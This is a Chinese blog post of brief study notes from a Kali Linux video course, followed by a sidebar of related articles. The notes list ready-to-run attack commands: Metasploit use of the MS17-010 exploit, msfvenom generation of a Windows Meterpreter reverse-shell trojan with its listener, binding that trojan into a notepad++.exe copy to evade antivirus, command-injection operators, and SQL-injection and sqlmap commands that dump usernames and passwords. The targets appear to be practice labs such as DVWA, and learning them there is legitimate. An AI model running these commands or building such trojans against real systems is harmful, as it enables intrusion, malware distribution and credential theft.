简单的kali操作(b站视频笔记)

已于 2024-08-07 19:35:12 修改
阅读量365 收藏 7
点赞数 3
文章标签: 笔记
于 2024-08-07 19:34:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhongnansqh/article/details/140999577
版权

取自上面的b站视频,这是部分学习笔记

1、远程控制
sudo su

msfconsole
search ms17_010
use 0
show options
set rhost
set lport
run
2、木马文件
生成木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.182.129 lport=9999 -f exe -o demo1.exe
监控 
msfconsole
use exploit/multi/handler
options
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.182.129
set lport 9999 
run
help

避免杀毒软件
捆绑木马msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.182.129 lport=9999 -f exe  -x notepad++.exe -o notepad++.exe
加密壳

3、命令执行漏洞

|  ;  &无论cmd1是否执行成功,cmd2将被执行
||cmd1失败,执行cmd2
&& cmd1成功,执行cmd2

cmd命令
whoami 查看用户名

ipconfig 看网卡信息

shutdown -s -t 0 关机

net user [][]/add

type[file_name]查看文件内容
白盒测试
黑盒测试 看不到源代码,命令连接符

空格的利用

4、SQL漏洞

select ticket_num from Movie_data where movie_name='' order by 1#';
原有的SQL语句被改变;

1判断是否可以sql注入
‘1' and 1=2#


进行sql注入
一、 判断列/字段数 1' order by 1#
 2' order by 2#
3' order by 3#

2、联合查询

1'union select user(),database()#

3、联合查询表

1'union select table_name,table_schema from information_schema.tables where table_schema='dvwa'#';

4、联合查询信息

1' union select user,password from users#';

SQLmap

kali linux
1、检测漏洞
python sqlmap.py -u "" --cookies=""//请求头的cookies
2、获取数据库名
python sqlmap.py -u "" --cookies="" --dbs
3、获取指定数据库表

python sqlmap.py -u "" --cookies="" -D dvwa --tables

4、python sqlmap.py -u "" --cookies="" -D dvwa -T users --columns
python sqlmap.py -u "" --cookies="" -D dvwa -T users --dump

热爱CV小海豚
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali视频学习笔记
cj1064789374的博客
08-29 2901
kali学习笔记
B站kali前5章笔记.zip
03-14
B站Kali Linux前五章笔记》是一个深入学习网络安全工具Kali Linux的资源集合,主要涵盖了初学者在入门阶段需要掌握的基础知识和关键技能。Kali Linux是一款基于Debian的开源操作系统,专为网络安全专业人士设计,...
Kali和Python渗透学习笔记——(一)网络扫描与信息搜集
love6a6的博客
09-13 319
本文主要讲述了Kali和Python渗透常用操作的学习内容笔记,涵盖了网络扫描与信息收集、漏洞发现、局域网攻击、社会工程学攻击、持续访问、网页攻击、无线网络攻击和网络爬虫等九个部分。其中,网页攻击部分将涉及至少七个方面的内容。此外,该视频还讲述了实验环境搭建的困难,但为确保学生能够完成实验,老师搭建了实验环境并在课程结束后开放给学生使用。实验环境分为Kali1和kali2,kali1主要做网页攻击实验,kali2准备的环境主要做其余的实验。
kali Linux笔记
世界那么大,我要学编程看看!
06-02 1099
kali linux安全渗透技术简介
kali-简单渗透笔记
weixin_30750335的博客
01-12 2598
端口扫描 nmap -sS 目标ipArp 内网断网Arpspoof -i 网卡 -t 目标ip 网关获取网卡/网关ifconfig获取内网ipfping -asg 192.168.1.0/24Arp 欺骗echo 写命令,是不会有回显的ehco 1 >proc/sys/net/ipv4/ip_forward# 进行IP流量转发目标 --》 我的网卡 --》网关driftnet --&gt...
Kali折腾笔记·贰:调教下新系统
HACKETTx的博客
11-29 3518
该篇博客主要记录干净Kali的调教记录:要修改哪些设置、要安装哪些软件、怎么安装,以及一些小问题及其应对,纯粹一篇记录。
Kali Rolling作为笔记本唯一一个系统
ncafei的博客
04-24 3777
前言 最近原来的Win7一个dll文件损坏,然后自己去找了一个dll文件替换,结果替换了两下开不了机了,用/sfc命令企图让win7自己修复,然后正中了那句话:win7的修复功能10次有9次不成功的,windows一直给我一种底层一直都很神秘,用户自己不容易维护,每次出问题想修复问题,但是最后都只能重装系统(错误信息不够精准和详细),所以一气之下,就把SSD的数据备份出来,直接格掉原来的win7
2024年网安最全网络安全B模块(笔记详解)- Linux操作系统渗透测试
2401_84281703的博客
05-01 38
得到密码登入网页创建木马把这个复制到404页面 这个就可以用nc来连接 Nc -lnvp 8888 就可以了 使用msf创建木马访问404页面3.找到/var/www目录中的图片文件,将图中的英文单词作为flag值提交;4.找到/home/guest目录中的txt文件,将文件内容作为flag值提交;5.找到/root目录中的txt文件,将文件内容作为flag值提交。使用root账号查看。
kali上docker学习笔记
weixin_43460822的博客
10-21 269
一、docker的概念 Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的 Linux或Windows 机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。(来自百度) docker中几个重要的概念 1、仓库:一个存放镜像的地方,镜像的拉取都是从仓库中拉取的 2、镜像:虚拟出的一个系统,如ubantu、kal...
Cracer渗透视频课程学习笔记——信息搜集
尘埃飞舞
08-06 7631
信息搜集 渗透一个网站收集这部分信息基本就够用了。 常用渗透测试系统:Back track5 ,parrot(新出来的),Kali(最好用的使用的人最多的) 一、DNS收集 域名--IP收集: 相关域名对应ip,相关工具:nslookup、一些工具网站 子域名收集: 工具:layer、sub...
b站王通R语言笔记可编辑
03-02
自己看b站王通R语言【视频链接:https://www.bilibili.com/video/BV19x411X7C6?p=1】,做的笔记,可以用typora软件进行编辑 笔记预览1:https://img-blog.csdnimg.cn/828735290a2d4c278dd6c82e6fc07926.png 笔记...
B站王道操作系统学习笔记.pdf
08-21
B站王道操作系统学习笔记.pdf
vue笔记 参看B站视频
04-22
vue笔记 参看B站视频
b站黑马程序员java视频学习笔记
08-16
b站黑马程序员java视频学习笔记
C++笔记5•内存管理•
qq_64446190的博客
08-12 1060
内存管理
LLama3技术报告笔记(SFT+DPO)
smartcat2010的博客
08-11 146
在原有的2类response基础上,加入一类edited:把人在chosen response上的修改;和经典方法效果是类似的,比经典方法的训练速度快;(经典方法:prompt和每个response分别当作1个样本,预测结果是1个分数)把prompt和2~3个response放在同一个样本里(response顺序打乱)reward model: 基于预训练模式,使用人工标注的Pair数据,得到;(output到底是什么?
第二十五天培训笔记
weixin_70756988的博客
08-12 1232
选项表示将所有的依赖和代码打包到一个单独的文件中,这样生成的可执行文件更便于。、设置清华镜像站(从国内下载安装包,提高下载和安装工具速度)文件夹中找到生成的可执行文件。可以将这个可执行文件拷贝。在不替换原有代码的情况下,应对数据库软件的升级)到其他机器上(即使该机器没有安装 Python。数据框架,用于保存从数据库中读取的数据)的工具,通过这个工具,就可以。上面命令执行失败:执行该命令。完成打包后,会在当前目录的。)修改为清华大学的镜像源。有完整的读取数据的工具,是知名的数据分析工具,
C++学习笔记----2、使用C++进行优雅编程(十)---- 格式化
最新发布
weixin_71738303的博客
08-14 977
许多人因为编程风格的问题被搞得焦头烂额,就因为对于在if中使用几个空格争论不休,导致友谊的小船说翻就翻。如果公司有相应的编程规范,只能说你比较幸运。因为有可能你不喜欢这些规范,但做为一个正常人来讲,至少有规范可循,而不用因为这些东东而陷于无谓的争执之中。如果确实没有编程规范,我建议还是建立这样的编程规范为好,编程规范可以让大家使用统一的命名方式,格式化的规则等等,使代码统一化,易于阅读和理解。当然了,也有一些自动化工具,在将代码提交到版本控制系统之前,依据特定的规则进行格式化。
Mybatis入门与配置详解:B站狂神系列视频笔记
"本资源是一份关于Mybatis的详细笔记,由B站UP主“遇见狂神说”系列视频中的内容整理而来。Mybatis是一个强大的持久层框架,主要用于Java应用程序与关系数据库之间的交互。这份笔记将带你从基础入门到深入理解,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值